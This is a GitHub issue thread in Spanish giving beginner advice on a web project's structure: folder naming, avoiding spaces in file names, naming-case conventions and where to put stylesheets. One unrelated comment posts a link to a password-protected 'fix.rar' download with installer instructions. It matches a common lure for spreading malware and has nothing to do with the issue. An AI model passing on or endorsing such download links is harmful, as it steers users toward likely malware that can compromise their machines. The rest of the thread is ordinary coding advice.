### ISSUE TITLE
Mejoras en la estructura del proyecto

### ISSUE THREAD

**Issue by emiarias** [teka06/RollingGamer#26]
Mejoras de código

En cuanto a la estructura del proyecto la carpeta que se crea para guardar imagenes o videos, suelen llamarla assets o img, en lugar de los dos nombres. por otra parte tengan en cuenta que los archivos y nombres de carpetas preferentemente no contengan espacios, podrian escribirlos con el formato camelcase (nombreDelArchivo) o separados por guiones kebab case (nombre-del-archivo) o snake_case (nombre_del_archivo), ademas como una consideración extra usen nombres sencillos de recordar, sobre todo cuando descagamos imagenes de internet.

Por otra parte hay una carpeta css en el proyecto con varias hojas de estilos, ademas hay una hoja de estilo suelta, esta ultima deberia estar dentro de la carpeta css del proyecto. Ademas si todas las carpetas son nombradas con minuscula, tambien dejen el mismo formato en esta carpeta, para evitar algunos nombres con mayusculas y otros con minusculas. Lo mismo en el nombre de archivos es una mejor practica escribirlos en un mismo idioma o todo en ingles o español.

Captura
![image](https://github.com/user-attachments/assets/ec53b2dc-05d4-4af6-8d14-5c9e39bb5316)
![image](https://github.com/user-attachments/assets/79827584-cf77-4693-a66b-15e73a8f7e90)

**Comment by littleblack666333** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by emiarias** [comment]
Resuelto
